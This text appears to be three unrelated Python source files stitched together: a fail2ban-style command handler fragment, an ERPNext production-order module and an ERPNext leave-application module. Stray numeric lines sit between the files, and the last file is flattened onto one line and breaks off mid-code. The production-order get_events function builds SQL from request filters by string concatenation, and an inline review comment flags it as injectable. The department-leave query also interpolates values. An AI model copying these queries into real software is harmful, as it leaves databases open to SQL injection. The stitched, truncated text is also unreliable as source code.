					raise ValueError("File option must be 'head' or 'tail'")
			elif len(command) > 4:
				raise ValueError("Only one file can be added at a time")
			self.__server.addLogPath(name, value, tail)
			return self.__server.getLogPath(name)
		elif command[1] == "dellogpath":
			value = command[2]
			self.__server.delLogPath(name, value)
			return self.__server.getLogPath(name)
		elif command[1] == "logencoding":
			value = command[2]
			self.__server.setLogEncoding(name, value)
			return self.__server.getLogEncoding(name)
		elif command[1] == "addjournalmatch": # pragma: systemd no cover
			value = command[2:]
			self.__server.addJournalMatch(name, value)
			return self.__server.getJournalMatch(name)
		elif command[1] == "deljournalmatch": # pragma: systemd no cover
			value = command[2:]
			self.__server.delJournalMatch(name, value)
			return self.__server.getJournalMatch(name)
		elif command[1] == "addfailregex":
			value = command[2]
			self.__server.addFailRegex(name, value)
			return self.__server.getFailRegex(name)
		elif command[1] == "delfailregex":
			# Deletion is by index, not by pattern text.
			value = int(command[2])
			self.__server.delFailRegex(name, value)
			return self.__server.getFailRegex(name)
		elif command[1] == "addignoreregex":
			value = command[2]
			self.__server.addIgnoreRegex(name, value)
			return self.__server.getIgnoreRegex(name)
		elif command[1] == "delignoreregex":
			value = int(command[2])
			self.__server.delIgnoreRegex(name, value)
			return self.__server.getIgnoreRegex(name)
		elif command[1] == "usedns":
			value = command[2]
			self.__server.setUseDns(name, value)
			return self.__server.getUseDns(name)
		elif command[1] == "findtime":
			value = command[2]
			self.__server.setFindTime(name, int(value))
			return self.__server.getFindTime(name)
		elif command[1] == "datepattern":
			value = command[2]
			self.__server.setDatePattern(name, value)
			return self.__server.getDatePattern(name)
		elif command[1] == "maxretry":
			value = command[2]
			self.__server.setMaxRetry(name, int(value))
			return self.__server.getMaxRetry(name)
		elif command[1] == "maxlines":
			value = command[2]
			self.__server.setMaxLines(name, int(value))
			return self.__server.getMaxLines(name)
		# command
		elif command[1] == "bantime":
			value = command[2]
			self.__server.setBanTime(name, int(value))
			return self.__server.getBanTime(name)
		elif command[1] == "banip":
			value = command[2]
			return self.__server.setBanIP(name,value)
		elif command[1] == "unbanip":
			value = command[2]
			self.__server.setUnbanIP(name, value)
			return value
		elif command[1] == "addaction":
			args = [command[2]]
			if len(command) > 3:
				# Optional action script path + JSON-encoded init kwargs.
				args.extend([command[3], json.loads(command[4])])
			self.__server.addAction(name, *args)
			return args[0]
		elif command[1] == "delaction":
			value = command[2]
			self.__server.delAction(name, value)
			return None
		elif command[1] == "action":
			actionname = command[2]
			actionkey = command[3]
			action = self.__server.getAction(name, actionname)
			if callable(getattr(action, actionkey, None)):
				# Callable attribute: invoke it with JSON-decoded kwargs.
				actionvalue = json.loads(command[4]) if len(command)>4 else {}
				return getattr(action, actionkey)(**actionvalue)
			else:
				# Plain attribute: assign the raw string value.
				actionvalue = command[4]
				setattr(action, actionkey, actionvalue)
				return getattr(action, actionkey)
		raise Exception("Invalid command (no set action or not yet implemented)")

	def __commandGet(self, command):
		"""Handle "get <name> ..." (read-only mirror of __commandSet)."""
		name = command[0]
		# Logging
		if name == "loglevel":
			return self.__server.getLogLevel()
		elif name == "logtarget":
			return self.__server.getLogTarget()
		elif name == "syslogsocket":
			return self.__server.getSyslogSocket()
		#Database
		elif name == "dbfile":
			db = self.__server.getDatabase()
			if db is None:
				return None
			else:
				return db.filename
		elif name == "dbpurgeage":
			db = self.__server.getDatabase()
			if db is None:
				return None
			else:
				return db.purgeage
		# Filter
		elif command[1] == "logpath":
			return self.__server.getLogPath(name)
		elif command[1] == "logencoding":
			return self.__server.getLogEncoding(name)
		elif command[1] == "journalmatch": # pragma: systemd no cover
			return self.__server.getJournalMatch(name)
		elif command[1] == "ignoreip":
			return self.__server.getIgnoreIP(name)
		elif command[1] == "ignorecommand":
			return self.__server.getIgnoreCommand(name)
		elif command[1] == "failregex":
			return self.__server.getFailRegex(name)
		elif command[1] == "ignoreregex":
			return self.__server.getIgnoreRegex(name)
		elif command[1] == "usedns":
			return self.__server.getUseDns(name)
		elif command[1] == "findtime":
			return self.__server.getFindTime(name)
		elif command[1] == "datepattern":
			return self.__server.getDatePattern(name)
		elif command[1] == "maxretry":
			return self.__server.getMaxRetry(name)
		elif command[1] == "maxlines":
			return self.__server.getMaxLines(name)
		# Action
		elif command[1] == "bantime":
			return self.__server.getBanTime(name)
		elif command[1] == "actions":
			return self.__server.getActions(name).keys()
		elif command[1] == "action":
			actionname = command[2]
			actionvalue = command[3]
			action = self.__server.getAction(name, actionname)
			return getattr(action, actionvalue)
		elif command[1] == "actionproperties":
			actionname = command[2]
			action = self.__server.getAction(name, actionname)
			# Public, non-callable attributes of the action.
			return [
				key for key in dir(action)
				if not key.startswith("_") and
					not callable(getattr(action, key))]
		elif command[1] == "actionmethods":
			actionname = command[2]
			action = self.__server.getAction(name, actionname)
			# Public, callable attributes of the action.
			return [
				key for key in dir(action)
				if not key.startswith("_") and callable(getattr(action, key))]
		raise Exception("Invalid command (no get action or not yet implemented)")

	def status(self, command):
		"""Server status (no args), jail status (1 arg), or flavored jail
		status (2 args: jail name + flavor)."""
		if len(command) == 0:
			return self.__server.status()
		elif len(command) == 1:
			name = command[0]
			return self.__server.statusJail(name)
		elif len(command) == 2:
			name = command[0]
			flavor = command[1]
			return self.__server.statusJail(name, flavor=flavor)
		raise Exception("Invalid command (no status)")
0.030901
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt

from __future__ import unicode_literals
import frappe, json

from frappe.utils import flt, nowdate, get_datetime, getdate, date_diff, cint
from frappe import _
from frappe.model.document import Document
from erpnext.manufacturing.doctype.bom.bom import validate_bom_no
from dateutil.relativedelta import relativedelta

# Raised when producing more than the Sales Order allows (incl. allowance %).
class OverProductionError(frappe.ValidationError): pass
# Raised when a Stock Entry would exceed the planned quantity.
class StockOverProductionError(frappe.ValidationError): pass
class OperationTooLongError(frappe.ValidationError): pass

from erpnext.manufacturing.doctype.workstation.workstation import WorkstationHolidayError, NotInWorkingHoursError
from erpnext.projects.doctype.time_log.time_log import OverlapError

form_grid_templates = {
	"operations": "templates/form_grid/production_order_grid.html"
}

class ProductionOrder(Document):
	"""Production Order: plans and tracks manufacture of an item against a BOM,
	optionally linked to a Sales Order, with capacity-planned operations."""

	def validate(self):
		"""Run all document-level validations on save."""
		if self.docstatus == 0:
			self.status = "Draft"

		from erpnext.controllers.status_updater import validate_status
		validate_status(self.status, ["Draft", "Submitted", "Stopped",
			"In Process", "Completed", "Cancelled"])

		self.validate_production_item()
		if self.bom_no:
			validate_bom_no(self.production_item, self.bom_no)

		self.validate_sales_order()
		self.validate_warehouse()
		self.calculate_operating_cost()
		self.validate_delivery_date()

		from erpnext.utilities.transaction_base import validate_uom_is_integer
		validate_uom_is_integer(self, "stock_uom", ["qty", "produced_qty"])

	def validate_sales_order(self):
		"""Ensure the linked Sales Order is submitted; default the expected
		delivery date from it and cap qty against it."""
		if self.sales_order:
			so = frappe.db.sql("""select name, delivery_date from `tabSales Order`
				where name=%s and docstatus = 1""", self.sales_order, as_dict=1)

			if len(so):
				if not self.expected_delivery_date:
					self.expected_delivery_date = so[0].delivery_date

				self.validate_production_order_against_so()
			else:
				frappe.throw(_("Sales Order {0} is not valid").format(self.sales_order))

	def validate_warehouse(self):
		"""FG and WIP warehouses must belong to this company."""
		from erpnext.stock.utils import validate_warehouse_company

		for w in [self.fg_warehouse, self.wip_warehouse]:
			validate_warehouse_company(w, self.company)

	def calculate_operating_cost(self):
		"""Recompute planned/actual operating cost per operation and the
		document total (actual cost wins over planned when present)."""
		self.planned_operating_cost, self.actual_operating_cost = 0.0, 0.0
		for d in self.get("operations"):
			d.planned_operating_cost = flt(d.hour_rate) * (flt(d.time_in_mins) / 60.0)
			d.actual_operating_cost = flt(d.hour_rate) * (flt(d.actual_operation_time) / 60.0)

			self.planned_operating_cost += flt(d.planned_operating_cost)
			self.actual_operating_cost += flt(d.actual_operating_cost)

		variable_cost = self.actual_operating_cost if self.actual_operating_cost else self.planned_operating_cost
		self.total_operating_cost = flt(self.additional_operating_cost) + flt(variable_cost)

	def validate_production_order_against_so(self):
		"""Total ordered qty across all POs for this item+SO (incl. packed
		items) may not exceed the SO qty plus the configured allowance %."""
		# already ordered qty
		ordered_qty_against_so = frappe.db.sql("""select sum(qty) from `tabProduction Order`
			where production_item = %s and sales_order = %s and docstatus < 2 and name != %s""",
			(self.production_item, self.sales_order, self.name))[0][0]

		total_qty = flt(ordered_qty_against_so) + flt(self.qty)

		# get qty from Sales Order Item table
		so_item_qty = frappe.db.sql("""select sum(qty) from `tabSales Order Item`
			where parent = %s and item_code = %s""",
			(self.sales_order, self.production_item))[0][0]
		# get qty from Packing Item table
		dnpi_qty = frappe.db.sql("""select sum(qty) from `tabPacked Item`
			where parent = %s and parenttype = 'Sales Order' and item_code = %s""",
			(self.sales_order, self.production_item))[0][0]
		# total qty in SO
		so_qty = flt(so_item_qty) + flt(dnpi_qty)

		allowance_percentage = flt(frappe.db.get_single_value("Manufacturing Settings",
			"over_production_allowance_percentage"))

		if total_qty > so_qty + (allowance_percentage/100 * so_qty):
			frappe.throw(_("Cannot produce more Item {0} than Sales Order quantity {1}").format(self.production_item,
				so_qty), OverProductionError)

	def stop_unstop(self, status):
		""" Called from client side on Stop/Unstop event"""
		self.update_status(status)
		# Stopping removes remaining qty from planned; unstopping re-adds it.
		qty = (flt(self.qty)-flt(self.produced_qty)) * ((status == 'Stopped') and -1 or 1)
		self.update_planned_qty(qty)
		frappe.msgprint(_("Production Order status is {0}").format(status))

	def update_status(self, status=None):
		"""Derive status from linked Stock Entries (Submitted -> In Process ->
		Completed) unless explicitly 'Stopped'; persist if changed."""
		if not status:
			status = self.status

		if status != 'Stopped':
			stock_entries = frappe._dict(frappe.db.sql("""select purpose, sum(fg_completed_qty)
				from `tabStock Entry` where production_order=%s and docstatus=1
				group by purpose""", self.name))

			status = "Submitted"
			if stock_entries:
				status = "In Process"
				produced_qty = stock_entries.get("Manufacture")
				if flt(produced_qty) == flt(self.qty):
					status = "Completed"

		if status != self.status:
			self.db_set("status", status)

	def update_production_order_qty(self):
		"""Update **Manufactured Qty** and **Material Transferred for Qty**
		in Production Order based on Stock Entry"""
		for purpose, fieldname in (("Manufacture", "produced_qty"),
			("Material Transfer for Manufacture", "material_transferred_for_manufacturing")):
			qty = flt(frappe.db.sql("""select sum(fg_completed_qty)
				from `tabStock Entry` where production_order=%s and docstatus=1
				and purpose=%s""", (self.name, purpose))[0][0])

			if qty > self.qty:
				frappe.throw(_("{0} ({1}) cannot be greater than planned quanitity ({2}) in Production Order {3}").format(\
					self.meta.get_label(fieldname), qty, self.qty, self.name), StockOverProductionError)

			self.db_set(fieldname, qty)

	def on_submit(self):
		"""Require both warehouses, create time logs and book planned qty."""
		if not self.wip_warehouse:
			frappe.throw(_("Work-in-Progress Warehouse is required before Submit"))
		if not self.fg_warehouse:
			frappe.throw(_("For Warehouse is required before Submit"))

		frappe.db.set(self,'status', 'Submitted')
		self.make_time_logs()
		self.update_planned_qty(self.qty)

	def on_cancel(self):
		"""Block cancellation while submitted Stock Entries exist; otherwise
		release planned qty and delete time logs."""
		# Check whether any stock entry exists against this Production Order
		stock_entry = frappe.db.sql("""select name from `tabStock Entry`
			where production_order = %s and docstatus = 1""", self.name)
		if stock_entry:
			frappe.throw(_("Cannot cancel because submitted Stock Entry {0} exists").format(stock_entry[0][0]))

		frappe.db.set(self,'status', 'Cancelled')
		self.update_planned_qty(-self.qty)
		self.delete_time_logs()

	def update_planned_qty(self, qty):
		"""update planned qty in bin"""
		args = {
			"item_code": self.production_item,
			"warehouse": self.fg_warehouse,
			"posting_date": nowdate(),
			"planned_qty": flt(qty)
		}
		from erpnext.stock.utils import update_bin
		update_bin(args)

	def set_production_order_operations(self):
		"""Fetch operations from BOM and set in 'Production Order'"""
		if not self.bom_no:
			return
		self.set('operations', [])

		operations = frappe.db.sql("""select operation, description, workstation, idx,
			hour_rate, time_in_mins, "Pending" as status from `tabBOM Operation`
			where parent = %s order by idx""", self.bom_no, as_dict=1)

		if operations:
			self.track_operations=1
		else:
			self.track_operations=0
			frappe.msgprint(_("Cannot 'track operations' as selected BOM does not have Operations."))

		self.set('operations', operations)
		self.calculate_time()

	def calculate_time(self):
		"""Scale each operation's BOM time to this order's quantity."""
		bom_qty = frappe.db.get_value("BOM", self.bom_no, "quantity")

		for d in self.get("operations"):
			d.time_in_mins = flt(d.time_in_mins) / flt(bom_qty) * flt(self.qty)

		self.calculate_operating_cost()

	def get_holidays(self, workstation):
		"""Return the holiday dates of the workstation's holiday list.
		NOTE(review): `holidays` is a fresh local dict, so the membership
		check is always True and provides no caching — confirm whether a
		module/class-level cache was intended."""
		holiday_list = frappe.db.get_value("Workstation", workstation, "holiday_list")

		holidays = {}

		if holiday_list not in holidays:
			holiday_list_days = [getdate(d[0]) for d in frappe.get_all("Holiday",
				fields=["holiday_date"], filters={"parent": holiday_list},
				order_by="holiday_date", limit_page_length=0, as_list=1)]

			holidays[holiday_list] = holiday_list_days

		return holidays[holiday_list]

	def make_time_logs(self):
		"""Capacity Planning. Plan time logs based on earliest availablity of workstation after
			Planned Start Date. Time logs will be created and remain in Draft mode and must be submitted
			before manufacturing entry can be made."""

		if not self.operations:
			return

		time_logs = []
		plan_days = frappe.db.get_single_value("Manufacturing Settings", "capacity_planning_for_days") or 30

		for i, d in enumerate(self.operations):
			self.set_operation_start_end_time(i, d)

			time_log = make_time_log(self.name, d.operation, d.planned_start_time, d.planned_end_time,
				flt(self.qty) - flt(d.completed_qty), self.project_name, d.workstation, operation_id=d.name)

			if d.workstation:
				# validate operating hours if workstation [not mandatory] is specified
				self.check_operation_fits_in_working_hours(d)

			original_start_time = time_log.from_time
			# Slide the slot forward until it saves cleanly: holidays move it
			# to the next day, off-hours to the next working slot, overlaps to
			# the next free slot — up to `plan_days` days out.
			while True:
				_from_time = time_log.from_time

				try:
					time_log.save()
					break
				except WorkstationHolidayError:
					time_log.move_to_next_day()
				except NotInWorkingHoursError:
					time_log.move_to_next_working_slot()
				except OverlapError:
					time_log.move_to_next_non_overlapping_slot()

				# reset end time
				time_log.to_time = get_datetime(time_log.from_time) + relativedelta(minutes=d.time_in_mins)

				if date_diff(time_log.from_time, original_start_time) > plan_days:
					frappe.msgprint(_("Unable to find Time Slot in the next {0} days for Operation {1}").format(plan_days, d.operation))
					break

				# Guard against an infinite loop: the slot must have moved.
				if _from_time == time_log.from_time:
					frappe.throw("Capacity Planning Error")

			d.planned_start_time = time_log.from_time
			d.planned_end_time = time_log.to_time
			d.db_update()

			if time_log.name:
				time_logs.append(time_log.name)

		self.planned_end_date = self.operations[-1].planned_end_time

		if time_logs:
			frappe.local.message_log = []
			frappe.msgprint(_("Time Logs created:") + "\n" + "\n".join(time_logs))

	def set_operation_start_end_time(self, i, d):
		"""Set start and end time for given operation. If first operation, set start as
			`planned_start_date`, else add time diff to end time of earlier operation."""
		if self.planned_start_date:
			if i==0:
				# first operation at planned_start date
				d.planned_start_time = self.planned_start_date
			else:
				d.planned_start_time = get_datetime(self.operations[i-1].planned_end_time)\
					+ self.get_mins_between_operations()

			d.planned_end_time = get_datetime(d.planned_start_time) + relativedelta(minutes = d.time_in_mins)

			if d.planned_start_time == d.planned_end_time:
				frappe.throw(_("Capacity Planning Error"))

	def get_mins_between_operations(self):
		"""Configured gap between consecutive operations (default 10 min),
		cached on the instance."""
		if not hasattr(self, "_mins_between_operations"):
			self._mins_between_operations = cint(frappe.db.get_single_value("Manufacturing Settings",
				"mins_between_operations")) or 10
		return relativedelta(minutes=self._mins_between_operations)

	def check_operation_fits_in_working_hours(self, d):
		"""Raises expection if operation is longer than working hours in the given workstation."""
		from erpnext.manufacturing.doctype.workstation.workstation import check_if_within_operating_hours
		check_if_within_operating_hours(d.workstation, d.operation, d.planned_start_time, d.planned_end_time)

	def update_operation_status(self):
		"""Set each operation's status from its completed qty vs. order qty."""
		for d in self.get("operations"):
			if not d.completed_qty:
				d.status = "Pending"
			elif flt(d.completed_qty) < flt(self.qty):
				d.status = "Work in Progress"
			elif flt(d.completed_qty) == flt(self.qty):
				d.status = "Completed"
			else:
				frappe.throw(_("Completed Qty can not be greater than 'Qty to Manufacture'"))

	def set_actual_dates(self):
		"""Derive actual start/end dates from submitted operation rows."""
		if self.get("operations"):
			actual_date = frappe.db.sql("""select min(actual_start_time) as start_date,
				max(actual_end_time) as end_date from `tabProduction Order Operation`
				where parent = %s and docstatus=1""", self.name, as_dict=1)[0]
			self.actual_start_date = actual_date.start_date
			self.actual_end_date = actual_date.end_date
		else:
			self.actual_start_date = None
			self.actual_end_date = None

	def validate_delivery_date(self):
		"""Warn (non-blocking) when delivery is expected before planned start."""
		if self.planned_start_date and self.expected_delivery_date \
			and getdate(self.expected_delivery_date) < getdate(self.planned_start_date):
				frappe.msgprint(_("Expected Delivery Date is lesser than Planned Start Date."))

	def delete_time_logs(self):
		"""Remove all Time Logs linked to this Production Order."""
		for time_log in frappe.get_all("Time Log", ["name"], {"production_order": self.name}):
			frappe.delete_doc("Time Log", time_log.name)

	def validate_production_item(self):
		"""Item must allow production orders and must not be a template."""
		if frappe.db.get_value("Item", self.production_item, "is_pro_applicable")=='No':
			frappe.throw(_("Item is not allowed to have Production Order."))

		if frappe.db.get_value("Item", self.production_item, "has_variants"):
			frappe.throw(_("Production Order cannot be raised against a Item Template"))

@frappe.whitelist()
def get_item_details(item):
	"""Return stock_uom/description and default BOM for an active item
	(falls back to the template's default BOM for variants)."""
	res = frappe.db.sql("""select stock_uom, description
		from `tabItem` where (ifnull(end_of_life, "0000-00-00")="0000-00-00" or end_of_life > now())
		and name=%s""", item, as_dict=1)

	if not res:
		return {}

	res = res[0]
	res["bom_no"] = frappe.db.get_value("BOM", filters={"item": item, "is_default": 1})

	if not res["bom_no"]:
		variant_of= frappe.db.get_value("Item", item, "variant_of")
		if variant_of:
			res["bom_no"] = frappe.db.get_value("BOM", filters={"item": variant_of, "is_default": 1})
	return res

@frappe.whitelist()
def make_stock_entry(production_order_id, purpose, qty=None):
	"""Build (without saving) a Stock Entry dict for the given Production
	Order: material transfer into WIP, or manufacture from WIP to FG."""
	production_order = frappe.get_doc("Production Order", production_order_id)

	stock_entry = frappe.new_doc("Stock Entry")
	stock_entry.purpose = purpose
	stock_entry.production_order = production_order_id
	stock_entry.company = production_order.company
	stock_entry.from_bom = 1
	stock_entry.bom_no = production_order.bom_no
	stock_entry.additional_operating_cost = production_order.additional_operating_cost
	stock_entry.use_multi_level_bom = production_order.use_multi_level_bom
	stock_entry.fg_completed_qty = qty or (flt(production_order.qty) - flt(production_order.produced_qty))

	if purpose=="Material Transfer for Manufacture":
		stock_entry.to_warehouse = production_order.wip_warehouse
	else:
		stock_entry.from_warehouse = production_order.wip_warehouse
		stock_entry.to_warehouse = production_order.fg_warehouse
	stock_entry.get_items()
	return stock_entry.as_dict()

@frappe.whitelist()
def get_events(start, end, filters=None):
	"""Calendar feed: Production Orders whose planned dates fall in [start, end].
	SECURITY NOTE(review): filter values are interpolated into SQL below; the
	replace('"', '\"') is a no-op because '\"' is the same character as '"',
	so this is injectable — should use parameterized conditions."""
	from frappe.desk.reportview import build_match_conditions
	if not frappe.has_permission("Production Order"):
		frappe.msgprint(_("No Permission"), raise_exception=1)

	conditions = build_match_conditions("Production Order")
	conditions = conditions and (" and " + conditions) or ""
	if filters:
		filters = json.loads(filters)
		for key in filters:
			if filters[key]:
				conditions += " and " + key + ' = "' + filters[key].replace('"', '\"') + '"'

	data = frappe.db.sql("""select name, production_item, planned_start_date, planned_end_date
		from `tabProduction Order`
		where ((ifnull(planned_start_date, '0000-00-00')!= '0000-00-00') \
				and (planned_start_date between %(start)s and %(end)s) \
			or ((ifnull(planned_start_date, '0000-00-00')!= '0000-00-00') \
				and planned_end_date between %(start)s and %(end)s)) {conditions}
		""".format(conditions=conditions), {
			"start": start,
			"end": end
		}, as_dict=True, update={"allDay": 0})
	return data

@frappe.whitelist()
def make_time_log(name, operation, from_time=None, to_time=None, qty=None,
	project=None, workstation=None, operation_id=None):
	"""Build (without saving) a manufacturing Time Log for one operation of
	the given Production Order; total hours computed when both times given."""
	time_log = frappe.new_doc("Time Log")
	time_log.for_manufacturing = 1
	time_log.from_time = from_time
	time_log.to_time = to_time
	time_log.production_order = name
	time_log.project = project
	time_log.operation_id = operation_id
	time_log.operation = operation
	time_log.workstation= workstation
	time_log.activity_type= "Manufacturing"
	time_log.completed_qty = flt(qty)
	if from_time and to_time :
		time_log.calculate_total_hours()
	return time_log
0.02492
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe, json from frappe import _ from frappe.utils import cint, cstr, date_diff, flt, formatdate, getdate, get_url_to_form, \ comma_or, get_fullname from frappe import msgprint from erpnext.hr.utils import set_employee_name class LeaveDayBlockedError(frappe.ValidationError): pass class OverlapError(frappe.ValidationError): pass class InvalidLeaveApproverError(frappe.ValidationError): pass class LeaveApproverIdentityError(frappe.ValidationError): pass from frappe.model.document import Document class LeaveApplication(Document): def validate(self): if not getattr(self, "__islocal", None) and frappe.db.exists(self.doctype, self.name): self.previous_doc = frappe.db.get_value(self.doctype, self.name, "*", as_dict=True) else: self.previous_doc = None set_employee_name(self) self.validate_to_date() self.validate_balance_leaves() self.validate_leave_overlap() self.validate_max_days() self.show_block_day_warning() self.validate_block_days() self.validate_leave_approver() def on_update(self): if (not self.previous_doc and self.leave_approver) or (self.previous_doc and \ self.status == "Open" and self.previous_doc.leave_approver != self.leave_approver): # notify leave approver about creation self.notify_leave_approver() elif self.previous_doc and \ self.previous_doc.status == "Open" and self.status == "Rejected": # notify employee about rejection self.notify_employee(self.status) def on_submit(self): if self.status != "Approved": frappe.throw(_("Only Leave Applications with status 'Approved' can be submitted")) # notify leave applier about approval self.notify_employee(self.status) def on_cancel(self): # notify leave applier about cancellation self.notify_employee("cancelled") def show_block_day_warning(self): from erpnext.hr.doctype.leave_block_list.leave_block_list import get_applicable_block_dates 
block_dates = get_applicable_block_dates(self.from_date, self.to_date, self.employee, self.company, all_lists=True) if block_dates: frappe.msgprint(_("Warning: Leave application contains following block dates") + ":") for d in block_dates: frappe.msgprint(formatdate(d.block_date) + ": " + d.reason) def validate_block_days(self): from erpnext.hr.doctype.leave_block_list.leave_block_list import get_applicable_block_dates block_dates = get_applicable_block_dates(self.from_date, self.to_date, self.employee, self.company) if block_dates: if self.status == "Approved": frappe.throw(_("Cannot approve leave as you are not authorized to approve leaves on Block Dates"), LeaveDayBlockedError) def get_holidays(self): return get_holidays(self) def get_total_leave_days(self): return get_total_leave_days(self) def validate_to_date(self): if self.from_date and self.to_date and \ (getdate(self.to_date) < getdate(self.from_date)): frappe.throw(_("To date cannot be before from date")) def validate_balance_leaves(self): if self.from_date and self.to_date: self.total_leave_days = self.get_total_leave_days()["total_leave_days"] if self.total_leave_days == 0: frappe.throw(_("The day(s) on which you are applying for leave are holiday. You need not apply for leave.")) if not is_lwp(self.leave_type): self.leave_balance = get_leave_balance(self.employee, self.leave_type, self.fiscal_year)["leave_balance"] if self.status != "Rejected" \ and self.leave_balance - self.total_leave_days < 0: #check if this leave type allow the remaining balance to be in negative. If yes then warn the user and continue to save else warn the user and don't save. 
if frappe.db.get_value("Leave Type", self.leave_type, "allow_negative"): frappe.msgprint(_("Note: There is not enough leave balance for Leave Type {0}").format(self.leave_type)) else: frappe.throw(_("There is not enough leave balance for Leave Type {0}").format(self.leave_type)) def validate_leave_overlap(self): if not self.name: self.name = "New Leave Application" for d in frappe.db.sql("""select name, leave_type, posting_date, from_date, to_date from `tabLeave Application` where employee = %(employee)s and docstatus < 2 and status in ("Open", "Approved") and (from_date between %(from_date)s and %(to_date)s or to_date between %(from_date)s and %(to_date)s or %(from_date)s between from_date and to_date) and name != %(name)s""", { "employee": self.employee, "from_date": self.from_date, "to_date": self.to_date, "name": self.name }, as_dict = 1): frappe.msgprint(_("Employee {0} has already applied for {1} between {2} and {3}").format(self.employee, cstr(d['leave_type']), formatdate(d['from_date']), formatdate(d['to_date']))) frappe.throw('<a href="#Form/Leave Application/{0}">{0}</a>'.format(d["name"]), OverlapError) def validate_max_days(self): max_days = frappe.db.get_value("Leave Type", self.leave_type, "max_days_allowed") if max_days and self.total_leave_days > max_days: frappe.throw(_("Leave of type {0} cannot be longer than {1}").format(self.leave_type, max_days)) def validate_leave_approver(self): employee = frappe.get_doc("Employee", self.employee) leave_approvers = [l.leave_approver for l in employee.get("employee_leave_approvers")] if len(leave_approvers) and self.leave_approver not in leave_approvers: frappe.throw(_("Leave approver must be one of {0}").format(comma_or(leave_approvers)), InvalidLeaveApproverError) elif self.leave_approver and not frappe.db.sql("""select name from `tabUserRole` where parent=%s and role='Leave Approver'""", self.leave_approver): frappe.throw(_("{0} ({1}) must have role 'Leave Approver'")\ 
.format(get_fullname(self.leave_approver), self.leave_approver), InvalidLeaveApproverError) elif self.docstatus==1 and len(leave_approvers) and self.leave_approver != frappe.session.user: msgprint(_("Only the selected Leave Approver can submit this Leave Application"), raise_exception=LeaveApproverIdentityError) def notify_employee(self, status): employee = frappe.get_doc("Employee", self.employee) if not employee.user_id: return def _get_message(url=False): if url: name = get_url_to_form(self.doctype, self.name) else: name = self.name return (_("Leave Application") + ": %s - %s") % (name, _(status)) self.notify({ # for post in messages "message": _get_message(url=True), "message_to": employee.user_id, "subject": _get_message(), }) def notify_leave_approver(self): employee = frappe.get_doc("Employee", self.employee) def _get_message(url=False): name = self.name employee_name = cstr(employee.employee_name) if url: name = get_url_to_form(self.doctype, self.name) employee_name = get_url_to_form("Employee", self.employee, label=employee_name) return (_("New Leave Application") + ": %s - " + _("Employee") + ": %s") % (name, employee_name) self.notify({ # for post in messages "message": _get_message(url=True), "message_to": self.leave_approver, # for email "subject": _get_message() }) def notify(self, args): args = frappe._dict(args) from frappe.core.page.messages.messages import post post(**{"txt": args.message, "contact": args.message_to, "subject": args.subject, "notify": cint(self.follow_via_email)}) def get_holidays(leave_app): tot_hol = frappe.db.sql("""select count(*) from `tabHoliday` h1, `tabHoliday List` h2, `tabEmployee` e1 where e1.name = %s and h1.parent = h2.name and e1.holiday_list = h2.name and h1.holiday_date between %s and %s""", (leave_app.employee, leave_app.from_date, leave_app.to_date))[0][0] # below line is needed. If an employee hasn't been assigned with any holiday list then above will return 0 rows. 
if not tot_hol: tot_hol = frappe.db.sql("""select count(*) from `tabHoliday` h1, `tabHoliday List` h2 where h1.parent = h2.name and h1.holiday_date between %s and %s and ifnull(h2.is_default,0) = 1 and h2.fiscal_year = %s""", (leave_app.from_date, leave_app.to_date, leave_app.fiscal_year))[0][0] return tot_hol @frappe.whitelist() def get_total_leave_days(leave_app): # Parse Leave Application if neccessary if isinstance(leave_app, str) or isinstance(leave_app, unicode): leave_app = frappe.get_doc(json.loads(leave_app)) """Calculates total leave days based on input and holidays""" ret = {'total_leave_days' : 0.5} if not leave_app.half_day: tot_days = date_diff(leave_app.to_date, leave_app.from_date) + 1 holidays = leave_app.get_holidays() ret = { 'total_leave_days' : flt(tot_days)-flt(holidays) } return ret @frappe.whitelist() def get_leave_balance(employee, leave_type, fiscal_year): leave_all = frappe.db.sql("""select total_leaves_allocated from `tabLeave Allocation` where employee = %s and leave_type = %s and fiscal_year = %s and docstatus = 1""", (employee, leave_type, fiscal_year)) leave_all = leave_all and flt(leave_all[0][0]) or 0 leave_app = frappe.db.sql("""select SUM(total_leave_days) from `tabLeave Application` where employee = %s and leave_type = %s and fiscal_year = %s and status="Approved" and docstatus = 1""", (employee, leave_type, fiscal_year)) leave_app = leave_app and flt(leave_app[0][0]) or 0 ret = {'leave_balance': leave_all - leave_app} return ret def is_lwp(leave_type): lwp = frappe.db.sql("select is_lwp from `tabLeave Type` where name = %s", leave_type) return lwp and cint(lwp[0][0]) or 0 @frappe.whitelist() def get_events(start, end): events = [] employee = frappe.db.get_value("Employee", {"user_id": frappe.session.user}, ["name", "company"], as_dict=True) if not employee: return events employee, company = employee.name, employee.company from frappe.widgets.reportview import build_match_conditions match_conditions = 
build_match_conditions("Leave Application") # show department leaves for employee if "Employee" in frappe.get_roles(): add_department_leaves(events, start, end, employee, company) add_leaves(events, start, end, match_conditions) add_block_dates(events, start, end, employee, company) add_holidays(events, start, end, employee, company) return events def add_department_leaves(events, start, end, employee, company): department = frappe.db.get_value("Employee", employee, "department") if not department: return # department leaves department_employees = frappe.db.sql_list("""select name from tabEmployee where department=%s and company=%s""", (department, company)) match_conditions = "employee in (\"%s\")" % '", "'.join(department_employees) add_leaves(events, start, end, match_conditions=match_conditions) def add_leaves(events, start, end, match_conditions=None): query = """select name, from_date, to_date, employee_name, half_day, status, employee, docstatus from `tabLeave Application` where (from_date between %s and %s or to_date between %s and %s) and docstatus < 2 and status!="Rejected" """ if match_conditions: query += " and " + match_conditions for d in frappe.db.sql(query, (start, end, start, end), as_dict=True): e = { "name": d.name, "doctype": "Leave Application", "from_date": d.from_date, "to_date": d.to_date, "status": d.status, "title": cstr(d.employee_name) + \ (d.half_day and _(" (Half Day)") or ""), "docstatus": d.docstatus } if e not in events: events.append(e) def add_block_dates(events, start, end, employee, company): # block days from erpnext.hr.doctype.leave_block_list.leave_block_list import get_applicable_block_dates cnt = 0 block_dates = get_applicable_block_dates(start, end, employee, company, all_lists=True) for block_date in block_dates: events.append({ "doctype": "Leave Block List Date", "from_date": block_date.block_date, "title": _("Leave Blocked") + ": " + block_date.reason, "name": "_" + str(cnt), }) cnt+=1 def add_holidays(events, start, 
